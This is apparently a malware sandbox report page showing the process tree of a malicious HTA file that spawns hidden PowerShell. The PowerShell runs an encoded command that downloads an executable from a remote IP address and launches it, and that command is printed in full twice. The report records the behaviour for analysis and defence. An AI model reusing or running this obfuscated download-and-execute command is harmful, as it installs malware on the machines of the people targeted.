popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\idki.hta.html

    632

    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:632 CREDAT:145409

      2080

      • poweRSHeLl.EXe "C:\Windows\SYSTEM32\windowsPOweRsHelL\v1.0\poweRSHeLl.EXe" "PoWErShELL -ex BypaSS -nOP -W 1 -ec IAAJAAkACQAJAAkACQBbAG4ARQBUAC4AUwBlAFIAdgBpAGMARQBwAG8AaQBuAFQATQBhAE4AQQBHAEUAcgBdADoAOgBzAEUAYwB1AFIASQBUAHkAcABSAE8AVABvAGMATwBsACAAIAAgACAAIAAgACAAIAA9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAE4ARQB0AC4AUwBlAGMAdQByAEkAdAB5AHAAUgBPAFQATwBjAG8ATAB0AFkAcABlAF0AOgA6AFQAbABzADEAMgAgACAAOwAgACAAIAAJAAkAIAAgACAAIAAJAAkACQAJAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAZwBFAFQAIAAJAAkAIAAJACAACQAJAAkACQAgAAkAKABbAGMASABhAHIAXQAgADEAMAA0ACAAIAArACAAWwBjAGgAQQBSAF0AIAAxADEANgAgACAAKwAgAFsAQwBoAGEAUgBdACAAMQAxADYAIAAgACsAIABbAEMASABhAFIAXQAgADEAMQAyACAAIAArACAAWwBjAGgAYQBSAF0AIAA1ADgAIAAgACsAIABbAGMASABhAHIAXQAgADQANwAgACAAKwAgAFsAYwBoAGEAUgBdACAANAA3ACAAIAArACAAWwBDAGgAQQBSAF0AIAA0ADkAIAAgACsAIABbAGMAaABBAFIAXQAgADQAOAAgACAAKwAgAFsAYwBIAEEAcgBdACAANQAxACAAIAArACAAWwBDAEgAQQByAF0AIAA0ADYAIAAgACsAIABbAEMAaABBAHIAXQAgADQAOQAgACAAKwAgAFsAYwBIAEEAcgBdACAANQA0ACAAIAArACAAWwBjAGgAYQBSAF0AIAA0ADYAIAAgACsAIABbAGMASABhAFIAXQAgADUAMAAgACAAKwAgAFsAQwBIAEEAcgBdACAANAA5ACAAIAArACAAWwBDAEgAQQByAF0AIAA1ADMAIAAgACsAIABbAEMAaABBAHIAXQAgADQANgAgACAAKwAgAFsAQwBoAGEAcgBdACAANQAwACAAIAArACAAWwBjAEgAYQBSAF0AIAA1ADcAIAAgACsAIABbAEMASABBAFIAXQAgADQANwAgACAAKwAgAFsAYwBIAGEAUgBdACAANgA2ACAAIAArACAAWwBjAGgAQQByAF0AIAA0ADkAIAAgACsAIABbAEMAaABBAFIAXQAgADUANwAgACAAKwAgAFsAQwBIAGEAUgBdACAANAA4ACAAIAArACAAWwBjAGgAQQBSAF0AIAA1ADIAIAAgACsAIABbAEMAaABBAFIAXQAgADQAOQAgACAAKwAgAFsAQwBIAEEAcgBdACAANAA3ACAAIAArACAAWwBDAGgAYQByAF0AIAA5ADkAIAAgACsAIABbAGMAaABhAHIAXQAgADEAMQA1ACAAIAArACAAWwBDAEgAYQByAF0AIAAxADEANAAgACAAKwAgAFsAQwBIAEEAUgBdACAAMQAxADUAIAAgACsAIABbAEMAaABBAFIAXQAgADEAMQA1ACAAIAArACAAWwBDAEgAQQBSAF0AIAAxADEAMAAgACAAKwAgAFsAQwBIAGEAUgBdACAAMQAwADYAIAAgACsAIABbAEMAaABBAFIAXQAgADQANgAgACAAKwAgAFsAQwBIAEEAcgBdACAAMQAwADEAIAAgACsAIABbAGMAaABhAHIAXQAgADEAMgAwACAAIAArACAAWwBDAEgAQQBSAF0AIAAxADAAMQAgACkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkALQBPAHUAdABmAGkAbABFACAACQAJAAkACQAJAAkACQAJACAAIAAJACAAIAAgAB0gJABlAG4AVgA6AFQARQBtAHAAXABpAGIAbQBfAGMAZQBuAHQAaQBpAG8AcwAuAGUAeABlAB0gIAAJAAkACQAJAAkACQAgACAACQAJACAAOwAgAAkACQAJAAkACQAJAAkACQBzAHQAYQByAFQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkAHSAkAEUATgB2ADoAdABlAE0AcABcAGkAYgBtAF8AYwBlAG4AdABpAGkAbwBzAC4AZQB4AGUAHSA= "

        2612

        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypaSS -nOP -W 1 -ec IAAJAAkACQAJAAkACQBbAG4ARQBUAC4AUwBlAFIAdgBpAGMARQBwAG8AaQBuAFQATQBhAE4AQQBHAEUAcgBdADoAOgBzAEUAYwB1AFIASQBUAHkAcABSAE8AVABvAGMATwBsACAAIAAgACAAIAAgACAAIAA9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAE4ARQB0AC4AUwBlAGMAdQByAEkAdAB5AHAAUgBPAFQATwBjAG8ATAB0AFkAcABlAF0AOgA6AFQAbABzADEAMgAgACAAOwAgACAAIAAJAAkAIAAgACAAIAAJAAkACQAJAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAZwBFAFQAIAAJAAkAIAAJACAACQAJAAkACQAgAAkAKABbAGMASABhAHIAXQAgADEAMAA0ACAAIAArACAAWwBjAGgAQQBSAF0AIAAxADEANgAgACAAKwAgAFsAQwBoAGEAUgBdACAAMQAxADYAIAAgACsAIABbAEMASABhAFIAXQAgADEAMQAyACAAIAArACAAWwBjAGgAYQBSAF0AIAA1ADgAIAAgACsAIABbAGMASABhAHIAXQAgADQANwAgACAAKwAgAFsAYwBoAGEAUgBdACAANAA3ACAAIAArACAAWwBDAGgAQQBSAF0AIAA0ADkAIAAgACsAIABbAGMAaABBAFIAXQAgADQAOAAgACAAKwAgAFsAYwBIAEEAcgBdACAANQAxACAAIAArACAAWwBDAEgAQQByAF0AIAA0ADYAIAAgACsAIABbAEMAaABBAHIAXQAgADQAOQAgACAAKwAgAFsAYwBIAEEAcgBdACAANQA0ACAAIAArACAAWwBjAGgAYQBSAF0AIAA0ADYAIAAgACsAIABbAGMASABhAFIAXQAgADUAMAAgACAAKwAgAFsAQwBIAEEAcgBdACAANAA5ACAAIAArACAAWwBDAEgAQQByAF0AIAA1ADMAIAAgACsAIABbAEMAaABBAHIAXQAgADQANgAgACAAKwAgAFsAQwBoAGEAcgBdACAANQAwACAAIAArACAAWwBjAEgAYQBSAF0AIAA1ADcAIAAgACsAIABbAEMASABBAFIAXQAgADQANwAgACAAKwAgAFsAYwBIAGEAUgBdACAANgA2ACAAIAArACAAWwBjAGgAQQByAF0AIAA0ADkAIAAgACsAIABbAEMAaABBAFIAXQAgADUANwAgACAAKwAgAFsAQwBIAGEAUgBdACAANAA4ACAAIAArACAAWwBjAGgAQQBSAF0AIAA1ADIAIAAgACsAIABbAEMAaABBAFIAXQAgADQAOQAgACAAKwAgAFsAQwBIAEEAcgBdACAANAA3ACAAIAArACAAWwBDAGgAYQByAF0AIAA5ADkAIAAgACsAIABbAGMAaABhAHIAXQAgADEAMQA1ACAAIAArACAAWwBDAEgAYQByAF0AIAAxADEANAAgACAAKwAgAFsAQwBIAEEAUgBdACAAMQAxADUAIAAgACsAIABbAEMAaABBAFIAXQAgADEAMQA1ACAAIAArACAAWwBDAEgAQQBSAF0AIAAxADEAMAAgACAAKwAgAFsAQwBIAGEAUgBdACAAMQAwADYAIAAgACsAIABbAEMAaABBAFIAXQAgADQANgAgACAAKwAgAFsAQwBIAEEAcgBdACAAMQAwADEAIAAgACsAIABbAGMAaABhAHIAXQAgADEAMgAwACAAIAArACAAWwBDAEgAQQBSAF0AIAAxADAAMQAgACkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkALQBPAHUAdABmAGkAbABFACAACQAJAAkACQAJAAkACQAJACAAIAAJACAAIAAgAB0gJABlAG4AVgA6AFQARQBtAHAAXABpAGIAbQBfAGMAZQBuAHQAaQBpAG8AcwAuAGUAeABlAB0gIAAJAAkACQAJAAkACQAgACAACQAJACAAOwAgAAkACQAJAAkACQAJAAkACQBzAHQAYQByAFQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkAHSAkAEUATgB2ADoAdABlAE0AcABcAGkAYgBtAF8AYwBlAG4AdABpAGkAbwBzAC4AZQB4AGUAHSA=

          2768

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf